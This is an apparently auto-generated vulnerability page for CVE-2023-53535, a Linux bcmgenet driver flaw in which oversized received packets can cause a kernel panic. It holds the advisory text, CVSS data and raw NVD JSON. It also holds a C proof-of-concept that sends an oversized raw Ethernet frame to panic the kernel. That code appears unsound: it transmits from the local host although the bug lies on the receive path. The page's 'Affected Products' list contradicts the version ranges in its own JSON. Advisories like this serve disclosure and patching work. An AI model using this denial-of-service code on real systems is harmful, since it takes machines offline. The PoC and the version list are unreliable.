Security Vulnerability Report
CVE-2023-53535 CVSS 5.5 MEDIUM

CVE-2023-53535

Published: 2025-10-04 16:15:48
Last Modified: 2026-03-23 18:37:23
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net: bcmgenet: Add a check for oversized packets

Occasionally we may get oversized packets from the hardware which exceed the nominal 2KiB buffer size we allocate SKBs with. Add an early check which drops the packet to avoid invoking skb_over_panic() and move on to processing the next packet.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (affected by the bcmgenet driver vulnerability)
Linux Kernel 6.6.x (some versions)
Linux Kernel 6.1.x LTS (some versions)
Linux Kernel 5.15.x LTS (some versions)
Linux Kernel 5.10.x LTS (some versions)
Linux Kernel 5.4.x LTS (some versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2023-53535 PoC - Trigger oversized packet handling in bcmgenet driver
// This PoC demonstrates how to trigger the vulnerability by sending oversized packets
// to a system using the bcmgenet network driver.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <arpa/inet.h>

#define OVERSIZED_PACKET_SIZE 4096  // Larger than the 2KiB SKB buffer
#define INTERFACE_NAME "eth0"       // Default bcmgenet interface name

int main(int argc, char *argv[]) {
    int sockfd;
    struct ifreq ifr;
    struct sockaddr_ll sll;
    unsigned char packet[OVERSIZED_PACKET_SIZE];
    const char *ifname = (argc > 1) ? argv[1] : INTERFACE_NAME;

    // Create raw packet socket
    sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }

    // Get interface index
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);
    if (ioctl(sockfd, SIOCGIFINDEX, &ifr) < 0) {
        perror("ioctl SIOCGIFINDEX");
        close(sockfd);
        return 1;
    }

    // Setup socket address structure
    memset(&sll, 0, sizeof(sll));
    sll.sll_family = AF_PACKET;
    sll.sll_ifindex = ifr.ifr_ifindex;
    sll.sll_protocol = htons(ETH_P_ALL);

    // Construct an oversized Ethernet frame
    memset(packet, 0xFF, sizeof(packet));

    // Set destination MAC
    packet[0] = 0xFF; packet[1] = 0xFF; packet[2] = 0xFF;
    packet[3] = 0xFF; packet[4] = 0xFF; packet[5] = 0xFF;

    // Set source MAC
    packet[6] = 0x00; packet[7] = 0x00; packet[8] = 0x00;
    packet[9] = 0x00; packet[10] = 0x00; packet[11] = 0x01;

    // EtherType
    packet[12] = 0x08; packet[13] = 0x00;  // IPv4

    printf("Sending oversized packet (%d bytes) on interface %s\n",
           OVERSIZED_PACKET_SIZE, ifname);

    // Send the oversized packet to trigger skb_over_panic()
    // The packet size exceeds the 2KiB SKB buffer allocated by bcmgenet
    if (sendto(sockfd, packet, OVERSIZED_PACKET_SIZE, 0,
               (struct sockaddr *)&sll, sizeof(sll)) < 0) {
        perror("sendto");
        close(sockfd);
        return 1;
    }

    printf("Oversized packet sent. If vulnerable, kernel panic may occur.\n");
    close(sockfd);
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53535", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:48.457", "lastModified": "2026-03-23T18:37:22.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bcmgenet: Add a check for oversized packets\n\nOccasionnaly we may get oversized packets from the hardware which\nexceed the nomimal 2KiB buffer size we allocate SKBs with. Add an early\ncheck which drops the packet to avoid invoking skb_over_panic() and move\non to processing the next packet."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.15", "versionEndExcluding": "4.14.308", "matchCriteriaId": "F6529FA7-0DC2-41A2-AEE7-C43E9796C426"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.276", "matchCriteriaId": "C902FC54-DDBD-4DA6-BFEF-26889A267464"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.235", "matchCriteriaId": "13DD5E68-8CB4-46EE-9A8F-C7F6C1A84430"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.173", "matchCriteriaId": "4D810CFB-B7C5-493C-B98A-0D5F0D8A47B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.99", "matchCriteriaId": "5B8B2AC9-2F31-4A0F-96F5-7E26B50B27BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.16", "matchCriteriaId": "0FD95FDA-6525-4B13-B3FB-49D9995FD8ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.3", "matchCriteriaId": "88C67289-22AD-4CA9-B202-5F5A80E5BA4B"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/124ca24e0de958d2e20e0aa1e2434af7b72f8887", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/411317d2a4a7d6049d8efeef0d32ae43f8baefce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5c0862c2c962052ed5055220a00ac1cefb92fbcd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5f56767fb5f2df875b6553e08dbec6a45431c988", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cdb07e10c1258c08f31b24898930e4ece88d163", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/841881320562cbeac7046b537b91cd000480cea2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/87363d1ab55e497702a9506ff423c422639c8a25", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c34b1c0870323649d45c5074828d7f754dea2673", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}